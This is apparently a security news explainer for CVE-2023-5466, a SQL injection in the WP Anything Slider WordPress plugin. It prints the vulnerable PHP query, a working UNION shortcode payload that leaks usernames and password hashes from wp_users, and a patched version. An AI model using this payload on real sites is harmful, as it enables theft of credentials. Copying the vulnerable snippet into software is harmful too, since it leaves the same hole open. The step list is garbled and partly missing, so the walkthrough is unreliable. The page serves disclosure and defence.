CVE CyberSecurity Database News

CVE-2023-5466 - SQL Injection Vulnerability in WP Anything Slider Plugin Explained

Poster -

*WordPress* is the world’s most popular CMS, so plugins that aren’t secure can have massive consequences. In this article, we’ll dig deep into CVE-2023-5466, a dangerous SQL Injection bug in the extremely popular WP Anything Slider plugin (up to and including version 9.1). We'll show you how it works, how attackers can exploit it, and how you can stay safe. This is an *exclusive*, straightforward guide with simple language and code examples.

What is CVE-2023-5466?

CVE-2023-5466 is a SQL Injection vulnerability in the WP Anything Slider plugin for WordPress. Anyone with at least a subscriber account on a vulnerable website can use the plugin’s shortcode to run malicious SQL. This can allow attackers to steal sensitive data, like usernames, email addresses, and even password hashes.

Vulnerability Type: Authenticated SQL Injection

- Patch Status: Fixed in v9.2 (as per plugin updates)

References

- Official CVE Page
- Wordfence Advisory
- WPScan Entry

Where’s the Problem?

The main problem lies in how the plugin processes data from its shortcode, like [wp-anything-slider id="1"]. The parameter here (id) is inserted into an SQL query without adequate sanitization or preparation.

Vulnerable Code Snippet (Simplified)

// Inside the plugin's PHP code

$id = $_GET['id']; // Or from shortcode attributes
global $wpdb;
$query = "SELECT * FROM {$wpdb->prefix}anything_slider WHERE id = $id";
$results = $wpdb->get_results($query);

Notice: The $id variable comes directly from user input, and it's put straight into an SQL statement. No escaping, no prepared statements—dangerous!

What’s SQL Injection?

SQL Injection is when an attacker puts malicious SQL statements instead of normal data. If those statements are not cleaned or checked, they get run by the database. That lets the attacker do things like:

Who Can Attack?

Only authenticated users (like registered “subscribers”) can exploit this bug because they have to post content containing the vulnerable shortcode.

Post this shortcode using the site’s content submission feature.

4. When the page loads, the plugin runs the injected SQL, and displays attacker-controlled results, often leaking sensitive info.

If the attacker wants to leak WordPress usernames and hashed passwords

[wp-anything-slider id="1 UNION SELECT 1,user_login,user_pass FROM wp_users -- "]

This changes the SQL query to look like

SELECT * FROM wp_anything_slider WHERE id = 1 UNION SELECT 1,user_login,user_pass FROM wp_users --

The UNION part tells MySQL to combine the slider data with login and password data from WordPress users. This information can then appear in the plugin’s output, visible to the attacker.

`

3. Visit the post on the site. If vulnerable, the slider area will now leak emails and password hashes from the wp_users table.

If You Own a Vulnerable Site

- Update your WP Anything Slider plugin to version 9.2 or above. (Download Latest)
- Sanitize/validate all user input going into SQL queries if you custom-code plugins.

A safe way to run the SQL would be

$id = intval($_GET['id']); // Sanitizes input to be integer
$query = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}anything_slider WHERE id = %d", $id);
$results = $wpdb->get_results($query);

Conclusion

CVE-2023-5466 is a serious vulnerability that shows how a small bug in a WordPress plugin can put a whole website at risk. If you’re using WP Anything Slider, update now and review your site for signs of exploitation. Always validate and escape any user input, even if it comes from trusted roles.

More References

- WP Anything Slider Plugin Directory
- SQL Injection Guide for Beginners (OWASP)

Timeline

Published on: 11/22/2023 16:15:12 UTC
Last modified on: 11/28/2023 19:29:09 UTC